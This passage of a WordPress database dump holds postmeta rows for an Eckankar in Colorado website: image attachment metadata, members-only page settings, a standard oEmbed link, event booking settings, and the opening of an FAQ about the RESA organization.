300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:36:\"landscape-temple-1-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:37:\"landscape-temple-1-sized-1074x500.jpg\";s:5:\"width\";i:1074;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6063,64990,'_wp_attached_file','2019/07/eck-temple-co-sm.jpg'),(6064,64990,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:434;s:6:\"height\";i:269;s:4:\"file\";s:28:\"2019/07/eck-temple-co-sm.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"eck-temple-co-sm-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-250x155.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-290x180.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:28:\"eck-temple-co-sm-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6076,68102,'_edit_lock','1698696849:2'),(6077,68102,'_edit_last','2'),(6086,68102,'_wp_page_template','default'),(6087,68102,'_wpac_members_redirect_to',''),(6088,68102,'_wpac_show_in_search','0'),(6089,68102,'_wpac_show_excerpt_in_search','0'),(6090,68102,'_wpac_nonmembers_redirect_to',''),(6091,68102,'boldgrid_hide_page_title','0'),(6092,68102,'boldgrid_in_page_containers','1'),(6093,68102,'bgseo_robots_index','index'),(6094,68102,'bgseo_robots_follow','follow'),(6112,68102,'_wpac_is_members_only','true'),(6155,68742,'_wp_attached_file','2019/07/ek-sym-gold-sm.png'),(6156,68742,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:71;s:6:\"height\";i:71;s:4:\"file\";s:26:\"2019/07/ek-sym-gold-sm.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"ek-sym-gold-sm-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10654,124763,'_wp_attached_file','2019/08/ECK_Temple_CO_015-o-1.jpg'),(10655,124763,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:540;s:6:\"height\";i:343;s:4:\"file\";s:33:\"2019/08/ECK_Temple_CO_015-o-1.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"ECK_Temple_CO_015-o-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-250x159.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-283x180.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-472x300.jpg\";s:5:\"width\";i:472;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_015-o-1-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10862,125673,'_wp_attached_file','2019/08/ECK_Temple_CO_025-lg.jpg'),(10863,125673,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_025-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_025-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_025-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442658109\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"23\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10864,125674,'_wp_attached_file','2019/08/ECK_Temple_CO_026-lg.jpg'),(10865,125674,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_026-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-300x248.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_026-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-250x207.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-550x455.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-218x180.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-363x300.jpg\";s:5:\"width\";i:363;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_026-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442658239\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10866,125675,'_wp_attached_file','2019/08/ECK_Temple_CO_027-lg.jpg'),(10867,125675,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_027-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_027-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_027-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442669418\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:18:\"0.0018214936247723\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6193,70160,'_wp_attached_file','2019/07/ETC-Org-Chart-3-15-2019.pdf'),(6194,70160,'_edit_lock','1565553073:2'),(6195,70278,'_edit_lock','1645117238:2'),(6196,70278,'_edit_last','2'),(6197,70278,'_wp_page_template','default'),(6198,70278,'_wpac_is_members_only','true'),(6199,70278,'_wpac_members_redirect_to',''),(6200,70278,'_wpac_show_in_search','0'),(6201,70278,'_wpac_show_excerpt_in_search','0'),(6202,70278,'_wpac_nonmembers_redirect_to',''),(6203,70278,'boldgrid_hide_page_title','0'),(6204,70278,'boldgrid_in_page_containers','1'),(6205,70278,'bgseo_robots_index','index'),(6206,70278,'bgseo_robots_follow','follow'),(6233,70845,'bgseo_robots_follow','follow'),(6232,70845,'bgseo_robots_index','index'),(6231,70845,'boldgrid_in_page_containers','1'),(6230,70845,'boldgrid_hide_page_title','0'),(6229,70845,'_wpac_nonmembers_redirect_to',''),(6228,70845,'_wpac_show_excerpt_in_search','0'),(6227,70845,'_wpac_show_in_search','0'),(6226,70845,'_wpac_members_redirect_to',''),(6225,70845,'_wpac_is_members_only','true'),(6224,70845,'_wp_page_template','default'),(6223,70845,'_edit_last','2'),(6222,70845,'_edit_lock','1686240685:2'),(6249,71622,'_edit_lock','1693413700:2'),(6250,71622,'_edit_last','2'),(6251,71622,'_wp_page_template','default'),(6252,71622,'_wpac_is_members_only','true'),(6253,71622,'_wpac_members_redirect_to',''),(6254,71622,'_wpac_show_in_search','0'),(6255,71622,'_wpac_show_excerpt_in_search','0'),(6256,71622,'_wpac_nonmembers_redirect_to',''),(6257,71622,'boldgrid_hide_page_title','0'),(6258,71622,'boldgrid_in_page_containers','1'),(6259,71622,'bgseo_robots_index','index'),(6260,71622,'bgseo_robots_follow','follow'),(6276,71767,'_edit_lock','1692370551:2'),(6277,71767,'_edit_last','2'),(6278,71767,'_wp_page_template','default'),(6279,71767,'_wpac_is_members_only','true'),(6280,71767,'_wpac_members_redirect_to',''),(6281,71767,'_wpac_show_in_search','0'),(6282,71767,'_wpac_show_excerpt_in_search','0'),(6283,71767,'_wpac_nonmembers_redirect_to',''),(6284,71767,'boldgrid_hide_page_title','0'),(6285,71767,'boldgrid_in_page_containers','1'),(6286,71767,'bgseo_robots_index','index'),(6287,71767,'bgseo_robots_follow','follow'),(6303,71864,'_edit_lock','1596726324:2'),(6304,71864,'_edit_last','2'),(6305,71864,'_wp_page_template','default'),(6306,71864,'_wpac_is_members_only','true'),(6307,71864,'_wpac_members_redirect_to',''),(6308,71864,'_wpac_show_in_search','0'),(6309,71864,'_wpac_show_excerpt_in_search','0'),(6310,71864,'_wpac_nonmembers_redirect_to',''),(6311,71864,'boldgrid_hide_page_title','0'),(6312,71864,'boldgrid_in_page_containers','1'),(6313,71864,'bgseo_robots_index','index'),(6314,71864,'bgseo_robots_follow','follow'),(6330,72053,'_edit_lock','1596726337:2'),(6331,72053,'_edit_last','2'),(6332,72053,'_wp_page_template','default'),(6333,72053,'_wpac_members_redirect_to',''),(6334,72053,'_wpac_show_in_search','0'),(6335,72053,'_wpac_show_excerpt_in_search','0'),(6336,72053,'_wpac_nonmembers_redirect_to',''),(6337,72053,'boldgrid_hide_page_title','0'),(6338,72053,'boldgrid_in_page_containers','1'),(6339,72053,'bgseo_robots_index','index'),(6340,72053,'bgseo_robots_follow','follow'),(6355,72150,'_edit_lock','1596726361:2'),(6356,72150,'_edit_last','2'),(6357,72150,'_wp_page_template','default'),(6358,72150,'_wpac_is_members_only','true'),(6359,72150,'_wpac_members_redirect_to',''),(6360,72150,'_wpac_show_in_search','0'),(6361,72150,'_wpac_show_excerpt_in_search','0'),(6362,72150,'_wpac_nonmembers_redirect_to',''),(6363,72150,'boldgrid_hide_page_title','0'),(6364,72150,'boldgrid_in_page_containers','1'),(6365,72150,'bgseo_robots_index','index'),(6366,72150,'bgseo_robots_follow','follow'),(6382,72247,'_edit_lock','1614445949:2'),(6383,72247,'_edit_last','2'),(6384,72247,'_wp_page_template','default'),(6385,72247,'_wpac_is_members_only','true'),(6386,72247,'_wpac_members_redirect_to',''),(6387,72247,'_wpac_show_in_search','0'),(6388,72247,'_wpac_show_excerpt_in_search','0'),(6389,72247,'_wpac_nonmembers_redirect_to',''),(6390,72247,'boldgrid_hide_page_title','0'),(6391,72247,'boldgrid_in_page_containers','1'),(6392,72247,'bgseo_robots_index','index'),(6393,72247,'bgseo_robots_follow','follow'),(6409,72344,'_edit_lock','1596726392:2'),(6410,72344,'_edit_last','2'),(6411,72344,'_wp_page_template','default'),(6412,72344,'_wpac_is_members_only','true'),(6413,72344,'_wpac_members_redirect_to',''),(6414,72344,'_wpac_show_in_search','0'),(6415,72344,'_wpac_show_excerpt_in_search','0'),(6416,72344,'_wpac_nonmembers_redirect_to',''),(6417,72344,'boldgrid_hide_page_title','0'),(6418,72344,'boldgrid_in_page_containers','1'),(6419,72344,'bgseo_robots_index','index'),(6420,72344,'bgseo_robots_follow','follow'),(6436,72441,'_edit_lock','1596726408:2'),(6437,72441,'_edit_last','2'),(6438,72441,'_wp_page_template','default'),(6439,72441,'_wpac_is_members_only','true'),(6440,72441,'_wpac_members_redirect_to',''),(6441,72441,'_wpac_show_in_search','0'),(6442,72441,'_wpac_show_excerpt_in_search','0'),(6443,72441,'_wpac_nonmembers_redirect_to',''),(6444,72441,'boldgrid_hide_page_title','0'),(6445,72441,'boldgrid_in_page_containers','1'),(6446,72441,'bgseo_robots_index','index'),(6447,72441,'bgseo_robots_follow','follow'),(6463,72538,'_edit_lock','1596726422:2'),(6464,72538,'_edit_last','2'),(6465,72538,'_wp_page_template','default'),(6466,72538,'_wpac_is_members_only','true'),(6467,72538,'_wpac_members_redirect_to',''),(6468,72538,'_wpac_show_in_search','0'),(6469,72538,'_wpac_show_excerpt_in_search','0'),(6470,72538,'_wpac_nonmembers_redirect_to',''),(6471,72538,'boldgrid_hide_page_title','0'),(6472,72538,'boldgrid_in_page_containers','1'),(6473,72538,'bgseo_robots_index','index'),(6474,72538,'bgseo_robots_follow','follow'),(6490,72635,'_edit_lock','1693796441:2'),(6491,72635,'_edit_last','2'),(6492,72635,'_wp_page_template','default'),(6493,72635,'_wpac_is_members_only','true'),(6494,72635,'_wpac_members_redirect_to',''),(6495,72635,'_wpac_show_in_search','0'),(6496,72635,'_wpac_show_excerpt_in_search','0'),(6497,72635,'_wpac_nonmembers_redirect_to',''),(6498,72635,'boldgrid_hide_page_title','0'),(6499,72635,'boldgrid_in_page_containers','1'),(6500,72635,'bgseo_robots_index','index'),(6501,72635,'bgseo_robots_follow','follow'),(6517,72732,'_edit_lock','1596726453:2'),(6518,72732,'_edit_last','2'),(6519,72732,'_wp_page_template','default'),(6520,72732,'_wpac_is_members_only','true'),(6521,72732,'_wpac_members_redirect_to',''),(6522,72732,'_wpac_show_in_search','0'),(6523,72732,'_wpac_show_excerpt_in_search','0'),(6524,72732,'_wpac_nonmembers_redirect_to',''),(6525,72732,'boldgrid_hide_page_title','0'),(6526,72732,'boldgrid_in_page_containers','1'),(6527,72732,'bgseo_robots_index','index'),(6528,72732,'bgseo_robots_follow','follow'),(6548,33553,'_oembed_52fd9b528e9f1b971a942e2431b5cc78','<blockquote class=\"wp-embedded-content\" data-secret=\"2fMRm3ur4X\"><a href=\"https://eckankar-colorado.org/alamosa-initiators-and-esas/\">Alamosa Initiators and ESA’s</a></blockquote><iframe title=\"&#8220;Alamosa Initiators and ESA’s&#8221; &#8212; Eckankar in Colorado\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https://eckankar-colorado.org/alamosa-initiators-and-esas/embed/#?secret=2fMRm3ur4X\" data-secret=\"2fMRm3ur4X\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),(6549,33553,'_oembed_time_52fd9b528e9f1b971a942e2431b5cc78','1564433171'),(6556,72053,'_wpac_is_members_only','true'),(192837,269146,'mec_tickets','a:0:{}'),(192838,269146,'mec_fees_global_inheritance','1'),(192839,269146,'mec_fees','a:0:{}'),(192840,269146,'mec_ticket_variations_global_inheritance','1'),(192841,269146,'mec_ticket_variations','a:0:{}'),(192842,269146,'mec_reg_fields_global_inheritance','1'),(192843,269146,'mec_reg_fields','a:0:{}'),(192844,269146,'mec_bfixed_fields','a:0:{}'),(192836,269146,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192835,269146,'mec_hourly_schedules','a:0:{}'),(192834,269146,'mec_not_in_days',''),(146804,265640,'_field_135','dogle007@yahoo.com'),(6639,79365,'_edit_lock','1570830246:2'),(6640,79365,'_edit_last','2'),(6641,79365,'wpsm_accordion_data','s:16602:\"a:12:{i:0;a:4:{s:15:\"accordion_title\";s:81:\"What is the RESA organization, what is it’s purpose, and how can it benefit me?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1414:\"<p>The Living ECK Master, writes that his overall mission is to tell people everywhere about the Light and Sound of God. First on the agenda was to set up the RESA (Regional ECK Spiritual Aide) structure, which began in the mid-1980s. To achieve this end meant finding ECK initiates who loved Sugmad, the ECK and the Mahanta above all else. They (you) were to be clear instruments of the Mahanta and thus help people in every part of the world find ECK. Next came the construction of our home at the Temple of ECK. Without the foundation of stages one and two, the third part of this mission would have faltered; to tell all people about the Light and Sound of God.</p>\r\n<p>The purpose of the RESA organization is to serve the spiritual needs 